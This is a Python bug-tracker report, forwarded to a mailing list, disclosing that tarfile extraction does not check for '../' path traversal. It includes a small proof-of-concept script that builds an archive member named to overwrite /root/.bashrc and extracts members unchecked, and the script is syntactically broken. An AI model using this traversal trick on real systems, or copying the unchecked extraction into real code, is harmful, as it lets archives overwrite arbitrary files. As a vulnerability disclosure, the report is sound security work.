[New-bugs-announce] [issue45170] tarfile missing cross-directory checking

daji ma report at bugs.python.org
Sat Sep 11 03:45:41 EDT 2021

New submission from daji ma <xiongpanju at gmail.com>:

tarfile missing cross-directory checking, like ../ or ..\, this  potentially cause cross-directory decompression.
the exp:
# -*- coding: utf-8 -*-
import tarfile

def extract_tar(file_path, dest_path):
        with tarfile.open(file_path, 'r') as src_file:
            for info in src_file.getmembers():
                src_file.extract(info.name, dest_path)
        return True
    except (IOError, OSError, tarfile.TarError):
        return False

def make_tar():
    tar_file.add('bashrc', '/../../../../root/.bashrc')

if __name__ == '__main__':
    extract_tar('x.tar.gz', 'xx')

components: Library (Lib)
messages: 401631
nosy: xiongpanju
priority: normal
severity: normal
status: open
title: tarfile missing cross-directory checking
type: security
versions: Python 3.8

Python tracker <report at bugs.python.org>

More information about the New-bugs-announce mailing list